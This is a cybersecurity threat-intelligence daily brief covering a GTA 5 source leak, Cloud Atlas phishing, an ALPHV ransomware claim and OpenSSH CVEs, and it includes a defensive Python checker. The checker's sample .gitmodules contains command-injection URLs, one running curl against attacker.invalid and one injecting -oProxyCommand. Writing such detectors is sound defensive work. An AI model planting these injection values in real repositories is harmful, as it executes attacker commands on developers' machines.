
ZeroFox Cyber Intelligence Daily Brief - December 26, 2023

by Alpha Team



ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

  • GTA 5 Source Code Reportedly Leaked Online a Year after Rockstar Hack
  • Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies
  • ALPHV Targets Apparel-Brands Owner VF Corporation

GTA 5 Source Code Reportedly Leaked Online a Year after Rockstar Hack

The source code for Grand Theft Auto (GTA) 5 was reportedly leaked on numerous channels, including Discord servers and a Telegram channel that had previously been used to leak stolen Rockstar data. The hackers, suspected to be connected with Lapsus$, posted links to the stolen source code along with a screenshot of one of its folders. Following the group's reduced activity after earlier arrests, suspected Lapsus$ members are reportedly active in a group tracked as Scattered Spider, which uses social engineering, phishing, multi-factor authentication (MFA) fatigue, and SIM-swapping attacks to gain initial access to large organizations' networks.

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

The threat actor Cloud Atlas, also tracked as Clean Ursa, Inception, Oxygen, and Red October, has reportedly been identified in spear-phishing attacks against Russian enterprises, including an agro-industrial enterprise and a state-owned research company. Known for persistent campaigns in Russia and Eastern Europe, Cloud Atlas relies on simple but effective methods and avoids open-source implants so that its tooling is less conspicuous. The attacks use a malicious HTML application that launches Visual Basic Script (VBS) files. In a separate disclosure, at least 20 Russian organizations have been compromised with Decoy Dog, a modified version of Pupy RAT attributed to an advanced persistent threat actor tracked as Hellhounds.

ALPHV Targets Apparel-Brands Owner VF Corporation

On December 25, ZeroFox Intelligence observed the ALPHV ransomware gang naming VF Corporation, owner of popular apparel brands including North Face, Vans, Supreme, and Jansport, as a victim on its leak site. The group claims that negotiations with VF Corporation have been underway since last week and says it will hide the leak-site post "after 3 days in an effort to reduce speculation" if the company decides to pay the ransom. On December 15, VF Corporation had reported a cybersecurity incident in which threat actors encrypted some of its systems and exfiltrated personal data.

THREAT ACTIVITY: INITIAL-ACCESS BROKERS, DATA BROKERS, AND HACKTIVISTS

VULNERABILITIES

  • CVE-2023-51385: In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name contains shell metacharacters and that name is referenced by an expansion token (such as %h or %r in ProxyCommand) in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in its user name or host name, which ssh expands when the submodule is fetched.
  • CVE-2021-41617: sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.
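
Both OpenSSH items above come down to configuration and input that an operator can check before the vulnerable code path is reached. The following Python script is an added example written for this brief (it is not ZeroFox or OpenSSH code): it scans a `.gitmodules` file for submodule URLs whose user or host name carries shell metacharacters of the kind CVE-2023-51385 turns into a command (the metacharacter set is an approximation of the check OpenSSH 9.6 added, not a copy of it), parses `ssh -V` output to tell whether the client is older than 9.6, and flags an `sshd_config` that runs `AuthorizedKeysCommand` or `AuthorizedPrincipalsCommand` as a non-root user on a 6.2 through 8.7 sshd, the condition CVE-2021-41617 requires. The `.gitmodules` and `sshd_config` contents, the `attacker.invalid` and `example.invalid` hosts, and the `lookup-keys` helper path are constructed sample input.

```python
"""Offline checks for CVE-2023-51385 (ssh) and CVE-2021-41617 (sshd)."""
import re

# Shell metacharacters in a host or user name that ssh would otherwise hand to
# the shell when expanding %h / %r. Assumption: approximates the OpenSSH 9.6
# denylist; it is not a copy of the upstream check.
HOST_META = set("'`\"$\\;&<>|(){}")
USER_META = set("'`\";&<>|(){}")


def unsafe_hostname(host: str) -> bool:
    """True if a host name could smuggle shell syntax into %h expansion."""
    if not host or host.startswith("-"):
        return True
    return any(c in HOST_META or c.isspace() or ord(c) < 32 for c in host)


def unsafe_username(user: str) -> bool:
    """True if a user name could smuggle shell syntax or an option into %r."""
    if not user:
        return False
    if user.startswith("-") or user.endswith("\\"):
        return True
    return any(c in USER_META for c in user)


def split_ssh_url(url: str):
    """Return (user, host) for ssh:// and scp-style git URLs, else None."""
    m = re.match(r"^ssh://([^/]*)", url)          # ssh://[user@]host[:port]/path
    if m:
        authority = m.group(1)
    elif "://" not in url and re.match(r"^[^/]+:", url):
        authority = url.split(":", 1)[0]          # [user@]host:path
    else:
        return None                               # https, file, relative path
    user, _, host = authority.rpartition("@")
    host = re.sub(r":\d+$", "", host)             # drop an explicit port
    return user, host


def risky_submodules(gitmodules: str):
    """Yield (submodule name, url, reason) for URLs with dangerous names."""
    name = None
    for line in gitmodules.splitlines():
        sec = re.match(r'^\s*\[submodule\s+"([^"]*)"\]', line)
        if sec:
            name = sec.group(1)
            continue
        kv = re.match(r"^\s*url\s*=\s*(.+?)\s*$", line)
        if not kv or name is None:
            continue
        parts = split_ssh_url(kv.group(1))
        if parts is None:
            continue                              # not an ssh transport
        user, host = parts
        if unsafe_hostname(host):
            yield name, kv.group(1), "hostname"
        elif unsafe_username(user):
            yield name, kv.group(1), "username"


def openssh_version(banner: str):
    """Parse 'OpenSSH_9.3p1, OpenSSL ...' (what ssh -V prints) to (major, minor)."""
    m = re.search(r"OpenSSH_(\d+)\.(\d+)", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def ssh_vulnerable_51385(version) -> bool:
    """Client-side fix shipped in OpenSSH 9.6."""
    return version is not None and version < (9, 6)


def sshd_config_exposed(config: str, version) -> list:
    """CVE-2021-41617: a helper run as another user keeps sshd's groups (6.2 to 8.7)."""
    opts = {}
    for line in config.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        opts.setdefault(parts[0].lower(), parts[1] if len(parts) > 1 else "")
    if not (version and (6, 2) <= version < (8, 8)):
        return []
    hits = []
    for cmd in ("authorizedkeyscommand", "authorizedprincipalscommand"):
        if cmd in opts and opts.get(cmd + "user", "root").lower() != "root":
            hits.append(cmd)
    return hits


# Constructed sample input: two hostile submodule URLs among benign ones.
SAMPLE_GITMODULES = """\
[submodule "vendor/safe"]
    path = vendor/safe
    url = git@github.com:example-org/safe.git
[submodule "vendor/bad-host"]
    path = vendor/bad-host
    url = ssh://`curl attacker.invalid`/repo.git
[submodule "vendor/bad-user"]
    path = vendor/bad-user
    url = -oProxyCommand=id@example.invalid:repo.git
[submodule "vendor/https"]
    path = vendor/https
    url = https://example.invalid/repo.git
"""

# Constructed sample sshd_config with the CVE-2021-41617 precondition.
SAMPLE_SSHD_CONFIG = """\
Port 22
AuthorizedKeysCommand /usr/local/bin/lookup-keys %u
AuthorizedKeysCommandUser sshkeys
"""

if __name__ == "__main__":
    for name, url, reason in risky_submodules(SAMPLE_GITMODULES):
        print(f"refuse submodule {name!r}: unsafe {reason} in {url}")
    client = openssh_version("OpenSSH_9.3p1, OpenSSL 3.0.9 30 May 2023")
    print("ssh client affected by CVE-2023-51385:", ssh_vulnerable_51385(client))
    print("sshd directives exposed to CVE-2021-41617:",
          sshd_config_exposed(SAMPLE_SSHD_CONFIG, (8, 4)))
```

Run the submodule check on an untrusted repository before `git submodule update` on any client older than 9.6; the `https://` entry is skipped on purpose, because only ssh transports reach the expansion tokens. For sshd, feed the live configuration with `sshd -T` so that defaults and `Match` blocks are already resolved, and upgrade to 8.8 or later rather than removing the helper.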

EXPLOITS

  • CVE-2021-21276: Polr is an open-source URL shortener. In Polr before version 2.3.0, a vulnerability in the setup process allows attackers to gain admin access to site instances, even if they do not possess an existing account.
  • CVE-2023-0777: Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.

BREACHES

Tags: DIB, TLP:GREEN